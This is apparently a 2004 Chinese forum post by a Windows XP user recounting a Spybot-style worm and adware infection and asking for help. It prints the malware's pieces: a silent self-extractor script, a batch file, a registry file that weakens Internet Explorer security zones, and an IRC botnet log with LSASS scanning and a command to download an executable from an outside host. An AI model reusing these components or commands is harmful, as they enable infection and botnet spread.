window自动升级惹的祸

我刚刚装的是winxpsp1(9394)英文版,本想升级打补丁，无奈遇到如下情况。

1，首先在在系统盘c盘中发现多了五个文件:sex.bat,sex.html,sex.REG,xfks.exe，autoexec.sys.

2，我是在装Norton AntiVirus 2004，正在升级病毒库时，突然被关闭，并且调不出任务栏，包括msconfig或regedit等一系列能修改启动信息的命令。

3，无奈，幸好有备份，于是ghost恢复，半天……，恢复成功，再次进入系统，没问题。

4，这一次，我先安装Norton AntiVirus 2004，然后重启，本以为一切都好了，当我再次升级病毒库时，又是无缘无故停止，同时调不出任务栏，包括msconfig或regedit等一系列能修改启动信息的命令。靠，受不了了，这可是新的系统呀！除了Norton，什么也没装，并且除了运行Norton升级程序之外，什么也没运行。怪！！这次我没有再ghost恢复系统，而是安装了dream tools虚拟光驱（缘由见结尾），竟然可以安装，意外，惊喜之余，想到了Windows优化大师的进程管理，于是便down了。还真行，可疑进程

如下:

////////////////////////////////////////////////////

进程快照列表：

进程10：C:\WINDOWS\System32\msie.exe(优先级：普通)。

进程12：C:\WINDOWS\System32\pqznks.exe(优先级：普通)，

进程16：C:\WINDOWS\System32\wuauclt.exe(优先级：普通)是两个，用户，系统，

进程18：C:\WINDOWS\System32\wuauclt.exe(优先级：普通)

////////////////////////////////////////////////

5，还等什么，关吧！于是任务栏，包括msconfig或regedit等一系列能修改启动信息的命令都出来了，启动信息发现pqznks.exe和msie.exe这两个特殊的信息，于是在注册表中

如下：

//////////////////////////////////////////////////////////

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]

"Microsoft Update"="sys32cfg.exe"

"Windows Media Player"="pfnqej.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]

"Windows Media Player"="pfnqej.exe"

//////////////////////////////////////////////

分别删除（包括启动菜单的一系列本人知道和启动有关的地方），本以为一切ok了，并且这次重新启动之前，我把Automatic Updates服务给关了。

6，再次启动，很快，比上一次快多了，这次一切正常，松了口气，你一定很奇怪，我为何把Automatic Updates服务给关了，那是我把sex.html用文本打开看了看，猜得，

如下：

////////////////////////////////////////////////

{

<html>

<head>

mtrslib_uid = '3728';

mtrslib_retry = 1;

mt_set_onload();

</script>

<Title>about blank</title>

</head>

<body>

</body>

</html>}

///////////////////////////////////////////////

7本人看不太懂，正在学习中，大概意思有自动运行升级程序，所以索性关了。再次上网，这次Norton升级很顺利，因为没升级之前，我用Norton扫了一下我收藏的那四个文件，首先提示病毒库太旧，要更新，我没理，可是没反应。那会行，那可是Norton呀！好奇之于，我升级，再次扫描，这一次有提示：

如下：

///////////////////////////////////////////////////////////////////

类别: 威胁警报

日期,功能,威胁名,操作及结果,项目类型,目标,可疑的操作,病毒定义版本,产品版本,用户名,计算机名,详细信息

9/5/2004 11:58:34 PM,??????,Adware.CDT,????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别：广告软件源：C:\Documents and Settings\ijake\Local Settings\Temporary Internet Files\Content.IE5\6F85QTQV\xfk[1].exe,说明：文件 C:\Documents and Settings\ijake\Local Settings\Temporary Internet Files\Content.IE5\6F85QTQV\xfk[1].exe 是一个广告软件威胁。"

9/5/2004 11:58:34 PM,??????,Adware.CDT,????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别：广告软件源：C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\6F85QTQV\xfk[1].exe,说明：文件 C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\6F85QTQV\xfk[1].exe 是一个广告软件威胁。"

9/5/2004 11:43:43 PM,????,W32.Spybot.Worm,??????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,源：C:\WINDOWS\SYSTEM32\SYS32CFG.EXE

9/5/2004 11:39:51 PM,??????,Adware.CDT,????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别：广告软件源：C:\jok\xfks.exe,说明：文件 C:\jok\xfks.exe 是一个广告软件威胁。"

9/5/2004 11:39:51 PM,??????,Adware.CDT,????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别：广告软件源：C:\jok\sex.REG,说明：文件 C:\jok\sex.REG 是一个广告软件威胁。"

9/5/2004 11:39:51 PM,??????,Adware.CDT,????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别：广告软件源：C:\jok\sex.html,说明：文件 C:\jok\sex.html 是一个广告软件威胁。"

9/5/2004 11:39:51 PM,??????,Adware.CDT,????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别：广告软件源：C:\jok\sex.bat,说明：文件 C:\jok\sex.bat 是一个广告软件威胁。"

9/5/2004 11:37:52 PM,??????,Adware.CDT,???,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别：广告软件源：C:\jok\xfks.exe,说明：文件 C:\jok\xfks.exe 是一个广告软件威胁。"

9/5/2004 11:37:52 PM,??????,Adware.CDT,???,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别：广告软件源：C:\jok\sex.REG,说明：文件 C:\jok\sex.REG 是一个广告软件威胁。"

9/5/2004 11:37:52 PM,??????,Adware.CDT,???,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别：广告软件源：C:\jok\sex.html,说明：文件 C:\jok\sex.html 是一个广告软件威胁。"

9/5/2004 11:37:52 PM,??????,Adware.CDT,???,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别：广告软件源：C:\jok\sex.bat,说明：文件 C:\jok\sex.bat 是一个广告软件威胁。"

9/5/2004 11:37:31 PM,??????,Adware.CDT,?????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别：广告软件源：C:\jok\xfks.exe,说明：文件 C:\jok\xfks.exe 是一个广告软件威胁。"

9/5/2004 11:37:31 PM,??????,Adware.CDT,?????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别：广告软件源：C:\jok\sex.REG,说明：文件 C:\jok\sex.REG 是一个广告软件威胁。"

9/5/2004 11:37:31 PM,??????,Adware.CDT,?????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别：广告软件源：C:\jok\sex.html,说明：文件 C:\jok\sex.html 是一个广告软件威胁。"

9/5/2004 11:37:31 PM,??????,Adware.CDT,?????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别：广告软件源：C:\jok\sex.bat,说明：文件 C:\jok\sex.bat 是一个广告软件威胁。

///////////////////////////////////////////////////////////////////

问题是删除不掉，迷茫，只好手动删了。

8，发现问题了，也解决了。想了想，不可能微软的网站被黑了吧！！？？于是就又一次启动自动升级，与此同时，去网上搜搜相关信息，郁闷，没有，又去了Norton官方网站，金山，瑞星，看了看最新的病毒库，没有。心里不甘，于是，想到到csdn发个帖子，和众高手讨论讨论，学习学习，正写着呢！又来了，老规矩！调不出任务栏，包括msconfig或regedit等一系列能修改启动信息的命令。更郁闷，不过，这次较确定（个人看法）是升级的是，于是，没有关它的启动信息，想看看它到底怎么一回事？？！！重启之后，发现了更好玩的window不断的安装同一个文件是微软的两个补丁，总共3.1m（编号没记住），如果我不把pfnqej.exe这进程关了，它就一直在装。真好玩，that's so funny! 我在那自嘲，这一次又看了看启动信息有变化，

如下：

/////////////////////////////////////////////////////////////////////////////

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]

"Microsoft Ansti Update"="msie.exe"

"Windows Media Player"="pqznks.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]

"Windows Media Player"="pqznks.exe"

//////////////////////////////////////////////////////////////////////////

于是怀疑是不是变种病毒？？不知道…………以后还敢不敢升级了…………会不会微软专门针对非正版用户（在我的概念里没有盗版之说，在这澄清一下）所专门设置的？？…………头都大了！！还是问大家吧！为了方便大家研究附一些信息：

（个人观点）

///////////////////////////////////////////////////

主要是xfks.exe这个55.9kb的winrar自解压文件，

注释为：

***********************************************

;The comment below contains SFX script commands

Path=C:SavePath

Setup=sex.bat

Silent=1

Overwrite=1

***********************************************

里边有三个文件：

sex.bat,sex.html,sex.REG。

sex.bat如下：

******************

@echo off

REGEDIT.EXE /S sex.REG

cls

sex.html

exit

******************

sex.html上面已给出

sex.REG如下：

***************************************************************************************************

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]

"1004"=dword:00000000

"1201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]

"1004"=dword:00000000

"1201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]

"1004"=dword:00000000

"1201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]

"1004"=dword:00000000

"1201"=dword:00000000

"1406"=dword:00000000

"1A04"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]

"1004"=dword:00000000

"1201"=dword:00000000

"1001"=dword:00000000

"1200"=dword:00000000

"1400"=dword:00000000

"1606"=dword:00000000

"1607"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults]

"http"=dword:00000000

********************************************************************************************************

不知道是这是什么目的？？

其中，在硬盘中搜msie.exe时发现msieftp.dll，MSIE.EXE-30E658AA.pf文件，可不知道如何打开*.dll,*.pf文件，望大虾告知，并且Norton警告时是Adware.CDT这个标示，到Norton官方网站搜一下，有很多信息，如需要，下次我会有选择发一些。

还有就是autoexec.sys如下：

***********************************************************************************************************************************************

NICK [RX]|733688

USER iuwibm 0 0 :[RX]|733688

:We.Are.From.Mars2 NOTICE [RX]|733688 :*** If you are having problems connecting due to ping timeouts, please type /quote pong 8264A5 or /raw pong 8264A5 now.

PING :8264A5

PONG :8264A5

JOIN #yourspace opens

:We.Are.From.Mars2 001 [RX]|733688 :Welcome to the We Are From Mars IRC Network [RX]|733688!iuwibm@219.157.119.151

USERHOST [RX]|733688

MODE [RX]|733688 -x+B

JOIN #yourspace opens

:We.Are.From.Mars2 002 [RX]|733688 :Your host is We.Are.From.Mars2, running version Unreal3.2

:We.Are.From.Mars2 003 [RX]|733688 :This server was created Wed Apr 28 18:15:19 2004

:We.Are.From.Mars2 004 [RX]|733688 We.Are.From.Mars2 Unreal3.2 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT

:We.Are.From.Mars2 005 [RX]|733688 MAP KNOCK SAFELIST HCN MAXCHANNELS=1 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=20 AWAYLEN=307 :are supported by this server

USERHOST [RX]|733688

MODE [RX]|733688 -x+B

JOIN #yourspace opens

:We.Are.From.Mars2 005 [RX]|733688 WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=We-Are-From-Mars CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server

USERHOST [RX]|733688

MODE [RX]|733688 -x+B

JOIN #yourspace opens

:We.Are.From.Mars2 251 [RX]|733688 :There are 7 users and 10912 invisible on 17 servers

:We.Are.From.Mars2 252 [RX]|733688 17 :operator(s) online

:We.Are.From.Mars2 253 [RX]|733688 3 :unknown connection(s)

:We.Are.From.Mars2 254 [RX]|733688 16 :channels formed

:We.Are.From.Mars2 255 [RX]|733688 :I have 1099 clients and 1 servers

:We.Are.From.Mars2 265 [RX]|733688 :Current Local Users: 1099 Max: 2845

:We.Are.From.Mars2 266 [RX]|733688 :Current Global Users: 10919 Max: 13845

:We.Are.From.Mars2 375 [RX]|733688 :- We.Are.From.Mars2 Message of the Day -

:We.Are.From.Mars2 372 [RX]|733688 :- 17/8/2004 10:34

:We.Are.From.Mars2 372 [RX]|733688 :- No Spamming, Packeting, DoS'ing, or Sending Viruses

:We.Are.From.Mars2 372 [RX]|733688 :- No harassing other Users at all

:We.Are.From.Mars2 372 [RX]|733688 :- When Caught u will be Removed from the Network.

:We.Are.From.Mars2 372 [RX]|733688 :-

:We.Are.From.Mars2 372 [RX]|733688 :- No Botnets Allowed On This Irc Network

:We.Are.From.Mars2 372 [RX]|733688 :-

:We.Are.From.Mars2 372 [RX]|733688 :- THIS NETWORK IS IN ACCORDANCE WITH THE INTERNET PRIVACY ACT.

:We.Are.From.Mars2 372 [RX]|733688 :- If you enter this Internet Relay Chat Server and channels and are a member of any

:We.Are.From.Mars2 372 [RX]|733688 :- government agency, the MPAA, RIAA, the music industry, any law enforcement agenc

:We.Are.From.Mars2 372 [RX]|733688 :- y, the software industry, or any legal firm, then :you are violating code 431.322

:We.Are.From.Mars2 372 [RX]|733688 :- .12 of the Internet Privacy Act signed by Bill Clinton in 1995 and MUST leave imm

:We.Are.From.Mars2 372 [RX]|733688 :- ediately.

:We.Are.

From.Mars2 376 [RX]|733688 :End of /MOTD command.

:[RX]|733688 MODE [RX]|733688 :+iw

:[RX]|733688!iuwibm@219.157.119.151 JOIN :#yourspace

:We.Are.From.Mars2 332 [RX]|733688 #yourspace :.advscan lsass 100 5 0 -r -b -s

:We.Are.From.Mars2 333 [RX]|733688 #yourspace djfkkj 1094550088

:We.Are.From.Mars2 353 [RX]|733688 @ #yourspace :[RX]|733688 @djfkkj

:We.Are.From.Mars2 366 [RX]|733688 #yourspace :End of /NAMES list.

:We.Are.From.Mars2 302 [RX]|733688 :[RX]|733688=+iuwibm@219.157.119.151

:We.Are.From.Mars2 NOTICE [RX]|733688 :BOTMOTD File not found

:[RX]|733688 MODE [RX]|733688 :+B

:We.Are.From.Mars2 405 [RX]|733688 #yourspace :You have joined too many channels

:We.Are.From.Mars2 302 [RX]|733688 :[RX]|733688=+iuwibm@219.157.119.151

:We.Are.From.Mars2 405 [RX]|733688 #yourspace :You have joined too many channels

:We.Are.From.Mars2 302 [RX]|733688 :[RX]|733688=+iuwibm@219.157.119.151

:We.Are.From.Mars2 405 [RX]|733688 #yourspace :You have joined too many channels

:djfkkj!DarkMastah@we.are.from.yourspace.com PRIVMSG [RX]|733688 :.login ysworld -s

:djfkkj!DarkMastah@we.are.from.yourspace.com PRIVMSG [RX]|733688 :.download http://www.animelegend.com/xfk.exe c:\xfks.exe 1 -s

PING :We.Are.From.Mars2

PONG :We.Are.From.Mars2

NICK [RX]|211872

USER yjlvzu 0 0 :[RX]|211872

:We.Are.From.Mars5 NOTICE [RX]|211872 :*** If you are having problems connecting due to ping timeouts, please type /quote pong F84DD41 or /raw pong F84DD41 now.

PING :F84DD41

PONG :F84DD41

JOIN #yourspace opens

:We.Are.From.Mars5 001 [RX]|211872 :Welcome to the We Are From Mars IRC Network [RX]|211872!yjlvzu@219.157.119.151

USERHOST [RX]|211872

MODE [RX]|211872 -x+B

JOIN #yourspace opens

:We.Are.From.Mars5 002 [RX]|211872 :Your host is We.Are.From.Mars5, running version Unreal3.2

:We.Are.From.Mars5 003 [RX]|211872 :This server was created Wed Apr 28 18:15:19 2004

:We.Are.From.Mars5 004 [RX]|211872 We.Are.From.Mars5 Unreal3.2 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT

:We.Are.From.Mars5 005 [RX]|211872 MAP KNOCK SAFELIST HCN MAXCHANNELS=1 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=20 AWAYLEN=307 :are supported by this server

USERHOST [RX]|211872

MODE [RX]|211872 -x+B

JOIN #yourspace opens

:We.Are.From.Mars5 005 [RX]|211872 WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=We-Are-From-Mars CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server

USERHOST [RX]|211872

MODE [RX]|211872 -x+B

JOIN #yourspace opens

:We.Are.From.Mars5 251 [RX]|211872 :There are 7 users and 10256 invisible on 17 servers

:We.Are.From.Mars5 252 [RX]|211872 17 :operator(s) online

:We.Are.From.Mars5 253 [RX]|211872 5 :unknown connection(s)

:We.Are.From.Mars5 254 [RX]|211872 16 :channels formed

:We.Are.From.Mars5 255 [RX]|211872 :I have 742 clients and 1 servers

:We.Are.From.Mars5 265 [RX]|211872 :Current Local Users: 742 Max: 1656

:We.Are.From.Mars5 266 [RX]|211872 :Current Global Users: 10263 Max: 13845

:We.Are.From.Mars5 375 [RX]|211872 :- We.Are.From.Mars5 Message of the Day -

:We.Are.From.Mars5 372 [RX]|211872 :- 17/8/2004 12:34

:We.Are.From.Mars5 372 [RX]|211872 :- No Spamming, Packeting, DoS'ing, or Sending Viruses

:We.Are.From.Mars5 372 [RX]|211872 :- No harassing other Users at all

:We.Are.From.Mars5 372 [RX]|211872 :- When Caught u will be Removed from the Network.

:We.Are.From.Mars5 372 [RX]|211872 :-

:We.Are.From.Mars5 372 [RX]|211872 :- No Botnets Allowed On This Irc Network

:We.Are.From.Mars5 372 [RX]|211872 :-

:We.Are.From.Mars5 372 [RX]|211872 :- THIS NETWORK IS IN ACCORDANCE WITH THE INTERNET PRIVACY ACT.

:We.Are.From.Mars5 372 [RX]|211872 :- If you enter this Internet Relay Chat Server and channels and are a member of any

:We.Are.From.Mars5 372 [RX]|211872 :- government agency, the MPAA, RIAA, the music industry, any law enforcement agenc

:We.Are.From.Mars5 372 [RX]|211872 :- y, the software industry, or any legal firm, then :you are violating code 431.322

:We.Are.From.Mars5 372 [RX]|211872 :- .12 of the Internet Privacy Act signed by Bill Clinton in 1995 and MUST leave imm

:We.Are.From.Mars5 372 [RX]|211872 :- ediately.

:We.Are.Fr

om.Mars5 376 [RX]|211872 :End of /MOTD command.

:[RX]|211872 MODE [RX]|211872 :+iw

:[RX]|211872!yjlvzu@219.157.119.151 JOIN :#yourspace

:We.Are.From.Mars5 332 [RX]|211872 #yourspace :.advscan lsass 100 5 0 -r -b -s

:We.Are.From.Mars5 333 [RX]|211872 #yourspace djfkkj 1094550088

:We.Are.From.Mars5 353 [RX]|211872 @ #yourspace :[RX]|211872 @djfkkj

:We.Are.From.Mars5 366 [RX]|211872 #yourspace :End of /NAMES list.

:We.Are.From.Mars5 302 [RX]|211872 :[RX]|211872=+yjlvzu@219.157.119.151

:We.Are.From.Mars5 NOTICE [RX]|211872 :BOTMOTD File not found

:[RX]|211872 MODE [RX]|211872 :+B

:We.Are.From.Mars5 405 [RX]|211872 #yourspace :You have joined too many channels

:We.Are.From.Mars5 302 [RX]|211872 :[RX]|211872=+yjlvzu@219.157.119.151

:We.Are.From.Mars5 405 [RX]|211872 #yourspace :You have joined too many channels

:We.Are.From.Mars5 302 [RX]|211872 :[RX]|211872=+yjlvzu@219.157.119.151

:djfkkj!DarkMastah@we.are.from.yourspace.com PRIVMSG [RX]|211872 :.login ysworld -s

:djfkkj!DarkMastah@we.are.from.yourspace.com PRIVMSG [RX]|211872 :.download http://www.animelegend.com/xfk.exe c:\xfks.exe 1 -s

:We.Are.From.Mars5 405 [RX]|211872 #yourspace :You have joined too many channels

PING :We.Are.From.Mars5

PONG :We.Are.From.Mars5

PRIVMSG #yourspace-e :[lsass]: Exploiting IP: 219.157.125.42.

:We.Are.From.Mars5 401 [RX]|211872 #yourspace-e :No such nick/channel

**********************************************************************************************************************************************

不过也不排除这是别人放的恶意木马，我这样想……………………

缘由：

…………………………………………………………………………

我的操作系统盘，除winxpsp1(9394)英文版，winme之外，其它都被朋友和同学拿走了，自己只剩硬盘上的镜像，要装其它系统eg:windows 2000sp4需要虚拟光驱将文件拷贝出来，说到这，我从硬盘上直接装2000，装不上，说c盘有错误，可是装winme可以，无奈winme频频死机，只好装珍藏的winxpsp1(9394)英文版了，把c盘分区删了，再创建，就可以了，怪！？

…………………………………………………………………………

有兴趣的朋友可以email联系：ijake@sohu.com

待续………………

3:44 AM 9/6/2004